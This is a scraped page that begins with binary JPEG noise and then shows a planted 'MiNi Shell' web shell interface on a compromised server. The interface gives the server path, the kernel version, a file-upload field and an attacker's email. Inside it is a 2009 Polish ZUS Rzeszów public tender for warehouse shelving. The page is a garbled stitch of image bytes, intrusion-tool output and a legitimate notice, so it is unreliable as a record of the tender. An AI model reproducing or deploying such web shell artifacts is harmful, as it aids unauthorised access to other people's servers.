JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090603/177602-N-2009.html

<p class="kh_header"><b>Rzeszów: Zakup regałów magazynowych dla O/ZUS w Rzeszowie i podległych Inspektoratów</b><br>
<b>Numer ogłoszenia: 177602 - 2009; data zamieszczenia: 03.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie , Al. Piłsudskiego 12, 35-075 Rzeszów, woj. podkarpackie, tel. 017 8675000, faks 017 8523638.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup regałów magazynowych dla O/ZUS w Rzeszowie i podległych Inspektoratów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa regałów metalowych stacjonarnych  do Inspektoratów ZUS w Tarnobrzegu, Mielcu, Stalowej Woli, Przeworsku, Jarosławiu, Przemyślu. Montaż regałów odbywać się będzie w poszczególnych Inspektoratach.Miejsce i sposób ustawienie regałów wg  wskazań Zamawiającego

1. Regały  I/ZUS Tarnobrzeg  ul. Sienkiewicza 145 d 

Charakterystyka regałów:
a)	półki szer. 35 cm z blachy stalowej montowane do słupków za pomocą złączy śrubowych (otwory owalne)
b)	szerokość regału pojedynczego 35 cm
c)	elementy pionowe nie łączone (jednoelementowe) z kształtowników metalowych z otworami montażowymi umożliwiającymi montaż półek z regulacją min  co 3 cm (odległości mierzone w osi otworów) 
d)	obecność elementów konstrukcyjnych - sztywnych ograniczników montowanych z tyłu oraz z boków regałów zabezpieczających przed przesuwaniem się akt na półki regału sąsiedniego i wypadaniem akt. Elementy boczne mą być wykonane i zamontowane w postaci dwóch płaskowników o szer. min 3,5 cm na każdy bok półki  regału.
e)	regały malowane  proszkowo lub piecowo w kolorze popielatym, struktura gładka
f)	odległość między podłożem a górą pierwszej półki 10 cm,
g)	odległość pomiędzy półkami mierzona pomiędzy górą półki a górą kolejnej półki -  31,5 cm (światło miedzy półkami  min 28 cm)
h)	maksymalna grubość półki w świetle- 3,5 cm,
i)	wysokość regału 200 cm,
j)	w każdym regale ilość półek 6 szt. 
k)	grubość blachy, wzmocnień dobrać do nośności półek:. półka szerokości 0.35 m i długości 1 mb powinna utrzymać ciężar  do  90 kg,
l)	maksymalna szerokość/ wysokość profili pionowych w przekroju poprzecznym- 4 cm,
m)	elementy pionowe poszczególnych regałów należy połączyć dodatkowymi profilami stalowymi uniemożliwiając  zabezpieczenie ich przed  przewróceniem 

Zestawienie ilości regałów - I/ZUS Tarnobrzeg 
	                              
1	pojedynczy zestawiony	4 mb	4 x 1,0 mb	1 szt.
2	podwójny  zestawiony	4 mb	4 x 1,0 mb	1 szt.
3	pojedynczy zestawiony	3 mb	3 x 1,0 mb	4 szt.
4	podwójny  zestawiony	3 mb	3 x 1,0 mb	1 szt.
5	pojedynczy zestawiony	1,6 mb	1 x 1,0 mb1 x 0,6 mb 1 szt.
6	pojedynczy zestawiony	3,6 mb	3 x 1,2 mb	2 szt.
7	pojedynczy zestawiony	2,4	2x 1,2 mb	1

Zestawienie elementów :
-	ilość półek:  1,0 m - 186 szt.; 1,2 m - 48 szt.;  0,6 m- 6 szt.
-	ilość elementów pionowych - 97 szt.
-	ograniczniki boczne i tylne - ilości zgodnie z opisem przedmiotu zamówienia .
W miejscach występowania oświetlenia, kanałów wentylacyjnych i podciągów  wysokość elementów pionowych Wykonawca dopasuje do  ich wysokości .

2. Regały  I/ZUS Mielec  ul. Sikorskiego 4    
Charakterystyka regałów:
a)	półki szer. 35 cm z blachy stalowej montowane do słupków za pomocą złączy śrubowych (otwory owalne)
b)	szerokość regału pojedynczego 35 cm
c)	elementy pionowe nie łączone (jednoelementowe) z kształtowników metalowych z otworami montażowymi umożliwiającymi montaż półek z regulacją min  co 3 cm (odległości mierzone w osi otworów)
d)	obecność elementów konstrukcyjnych - sztywnych ograniczników montowanych z tyłu oraz z boków regałów zabezpieczających przed przesuwaniem się akt na półki regału sąsiedniego i wypadaniem akt.  Elementy  boczne mą być wykonane i zamontowane w postaci dwóch płaskowników o szer. min 3,5 cm na każdy bok półki  regału.
e)	regały malowane proszkowo lub piecowo w kolorze popielatym, struktura gładka
f)	odległość między podłożem a górą pierwszej półki 10 cm,
g)	maksymalna grubość półki w świetle- 3,5 cm,
h)	wysokości regału i ilości półek w regale : 240 cm - 7 półek ; 250 cm - 8 półek; 245 cm - 8 półek  
i)	grubość blachy, wzmocnień dobrać do nośności półek:. półka szerokości 0.35 m i długości 0,9; 1 mb powinna utrzymać ciężar  do  90 kg,
j)	maksymalna szerokość/ wysokość profili  pionowych w przekroju poprzecznym- 4 cm,
k)	elementy pionowe poszczególnych regałów należy połączyć dodatkowymi profilami stalowymi uniemożliwiając  zabezpieczenie ich przed  przewróceniem.
Zestawienie ilości regałów - I/ZUS Mielec 
                                         Dł.      Wys.      Ilość półek  Ilość szt. regału  
1	pojedynczy 	1 m	240 cm 	7	              13
2	pojedynczy	1 m	250 cm	8	              16
3	pojedynczy 	1 m	245 cm 	8	              55
4	pojedynczy	0,9  m	245 cm 	8	              14
					
Zestawienie elementów :
-	ilość półek:  1,0 m - 659 szt.; 0,9 m - 112 szt.; 
 -	ilość elementów pionowych : 240 cm - 52 szt., 250 cm - 64  szt.;
245 cm - 276 szt.ograniczniki boczne i tylne - ilości zgodnie z opisem przedmiotu zamówienia.
W miejscach występowania oświetlenia, kanałów wentylacyjnych i podciągów  wysokość elementów pionowych Wykonawca dopasuje do  ich wysokości .

3. Regały  I/ZUS Stalowa Wola   ul. Popiełuszki 8 
Charakterystyka regałów:
a)	półki szer. 35 cm z blachy stalowej montowane do słupków za pomocą złączy śrubowych (otwory owalne)
b)	szerokość regału pojedynczego   35 cm
c)	elementy pionowe nie łączone (jednoelementowe) z kształtowników metalowych z otworami montażowymi umożliwiającymi montaż półek z regulacją min co 3 cm (odległości mierzone w osi otworów)
d)	obecność elementów konstrukcyjnych - sztywnych ograniczników montowanych z tyłu oraz z boków regałów zabezpieczających przed przesuwaniem się akt na półki regału sąsiedniego i wypadaniem akt.  Elementy  boczne mą być  wykonane i zamontowane w postaci dwóch płaskowników o szer. min 3,5 cm na każdy bok półki  regału.
e)	regały malowane proszkowo lub piecowo w kolorze popielatym, struktura gładka
f)	odległość między podłożem a górą pierwszej półki 10 cm,
g)	maksymalna grubość półki w świetle- 3,5 cm,
h)	wysokości regału i ilości półek w regale : 250 cm - 8 półek 
i)	grubość blachy, wzmocnień dobrać do nośności półek:. półka szerokości 0.35 m i długości 1 mb powinna utrzymać ciężar  do  90 kg,
j)	maksymalna szerokość/ wysokość profili  pionowych w przekroju poprzecznym- 4 cm,
k)	elementy pionowe poszczególnych regałów należy połączyć dodatkowymi profilami stalowymi uniemożliwiając  zabezpieczenie ich przed  przewróceniem.
Zestawienie ilości regałów - I/ZUS Stalowa Wola  
                                       Dł.          Wys.   Ilość półek Ilość szt.   
1	pojedynczy 	1 m	250 cm 	8	30
					
Zestawienie elementów :
-	ilość półek:  1,0 m - 240 szt.
-	ilość elementów pionowych : 250 cm - 120 szt.
ograniczniki boczne i tylne  - ilości zgodnie  z opisem przedmiotu zamówieniaW miejscach występowania oświetlenia, kanałów wentylacyjnych i podciągów  wysokość elementów pionowych Wykonawca dopasuje do  ich wysokości.

4. Regały  I/ZUS   Przemyśl    ul. Popiełuszki 8,  I/ZUS  Jarosław ul. Słowackiego 21  

Charakterystyka regałów:
a)	półki szer. 35 cm z blachy stalowej montowane do słupków za pomocą złączy śrubowych (otwory owalne)
b)	szerokość regału pojedynczego   35 cm
c)	elementy pionowe nie łączone (jednoelementowe) z kształtowników metalowych z otworami montażowymi umożliwiającymi montaż półek z regulacją min  co 3 cm (odległości mierzone w osi otworów)
d)	obecność elementów konstrukcyjnych - sztywnych ograniczników montowanych z tyłu oraz z boków regałów zabezpieczających przed przesuwaniem się akt na półki regału sąsiedniego i wypadaniem akt. Elementy boczne mą być wykonane i zamontowane w postaci dwóch płaskowników o szer. min 3,5 cm na każdy bok półki  regału.
e)	regały malowane  proszkowo lub piecowo w kolorze popielatym, struktura gładka
f)	odległość między podłożem a górą pierwszej półki 10 cm,
g)	maksymalna grubość półki w świetle- 3,5 cm,
h)	wysokości regału i ilości półek w regale : 250 cm - 8 półek 
i)	grubość blachy, wzmocnień dobrać do nośności półek:. półka szerokości 0.35 m i długości 1 mb powinna utrzymać ciężar  do  90 kg,
j)	maksymalna szerokość/ wysokość profili  pionowych w przekroju poprzecznym- 4 cm,
k)	elementy pionowe  poszczególnych regałów należy połączyć  dodatkowymi profilami stalowymi uniemożliwiając  zabezpieczenie ich przed  przewróceniem

Zestawienie ilości regałów - I/ZUS Przemyśl   
                                       Dł.	 Wys.  Ilość półek  Ilość szt.   
1	pojedynczy 	1 m	250 cm 	8	6
					
Zestawienie ilości regałów - I/ZUS Jarosław   
                                        Dł.          Wys.  Ilość półek Ilość szt.   
1	pojedynczy 	1 m	250 cm 	8	2
					
Zestawienie elementów I/ZUS Przemyśl :
-	ilość półek:  1,0 m - 48 szt.
-	ilość elementów pionowych : 250 cm - 24 szt.
ograniczniki boczne i tylne - ilości zgodnie z opisem przedmiotu zamówienia. Zestawienie elementów I/ZUS Jarosław :
-	ilość półek:  1,0 m - 16 szt.
-	ilość elementów pionowych : 250 cm - 8 szt. ograniczniki boczne i tylne - ilości zgodnie z opisem przedmiotu zamówienia.W miejscach występowania oświetlenia, kanałów wentylacyjnych i  podciągów  wysokość elementów pionowych Wykonawca dopasuje do  ich wysokości 

5. Regały  I/ZUS Przeworsk   ul. Dworcowa 1    
Montaż regałów odbywać się będzie w Inspektoracie. Miejsce i sposób ustawienie regałów wg wskazań Zamawiającego  
Charakterystyka regałów:a)	półki szer. 35 cm z blachy stalowej montowane do słupków za pomocą złączy śrubowych (otwory owalne)
b)	szerokość regału pojedynczego 35 cm
c)	elementy pionowe nie łączone (jednoelementowe) z kształtowników metalowych z otworami montażowymi umożliwiającymi montaż półek z regulacją min co 3 cm (odległości mierzone w osi otworów)
d)	obecność elementów konstrukcyjnych - sztywnych ograniczników montowanych z tyłu oraz z boków regałów zabezpieczających przed przesuwaniem się akt na półki regału sąsiedniego i wypadaniem akt.  Elementy  boczne mą być  wykonane i zamontowane w postaci dwóch płaskowników o szer. min 3,5 cm na każdy bok półki  regału.
e)	regały malowane proszkowo lub piecowo w kolorze popielatym, struktura gładka
f)	odległość między podłożem a górą pierwszej półki 10 cm,
g)	maksymalna grubość półki w świetle- 3,5 cm,
h)	wysokości regału i ilości półek w regale : 250 cm 
i)	grubość blachy, wzmocnień dobrać do nośności półek:. półka szerokości 0.35 m i długości 1 mb powinna utrzymać ciężar  do  90 kg,
j)	maksymalna szerokość/ wysokość profili  pionowych w przekroju poprzecznym- 4 cm,
k)	elementy pionowe  poszczególnych regałów należy połączyć dodatkowymi profilami stalowymi uniemożliwiając  zabezpieczenie ich przed  przewróceniem.

Zestawienie ilości regałów - I/ZUS Przeworsk  

                                       Dł.          Wys. 	Ilość półek Ilość szt.   
1	pojedynczy 	1 m	250 cm 	4	48
2	pojedynczy	1 m	250 cm	5	99
Zestawienie elementów :
-	ilość półek:  1,0 m - 687 szt.
-	ilość elementów pionowych : 250 cm - 588 szt.ograniczniki boczne i tylne - ilości zgodnie z opisem przedmiotu zamówienia. W miejscach występowania oświetlenia, kanałów wentylacyjnych i podciągów  wysokość elementów pionowych Wykonawca dopasuje do  ich wysokości.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.10.00-9, 39.12.11.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 35.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych, tzn:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego 
 Zamawiający dokona oceny spełniania warunków na podstawie złożonych dokumentów metodą 0(nie spełnia) - 1 (spełnia).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków określonych w pkt. 1. Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych oraz Ponadto na potwierdzenie warunku określonego w pkt. 1. a  przedstawi:
I.1	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składnia ofert, 
Na potwierdzenie spełnienia warunku określonego w pkt. 1.d  Wykonawca złoży oświadczenie, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy - Prawo zamówień publicznych oraz:
 I. 2. zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca  nie zalega z opłacaniem podatków, opłat, lub zaświadczenie, że uzyskał przewidzianą prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
I.3. zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne , lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert.
II. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów określonych w pkt. I składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
II.1. Dokument, o którym mowa w pkt. II lit. a), powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
II.2. Dokument, o którym mowa w pkt. II. lit. b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt. II. lit. a) i b), Wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Terminy określone w pkt. II.1. i II.2. stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie Al.Piłsudskiego 12, 35 - 075 Rzeszów, (pok. Nr 2 ul. Siemiradzkiego 8).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 10:00, miejsce: Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie Al.Piłsudskiego 12, 35 - 075 Rzeszów, pok. Nr 23 - Dziennik podawczy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com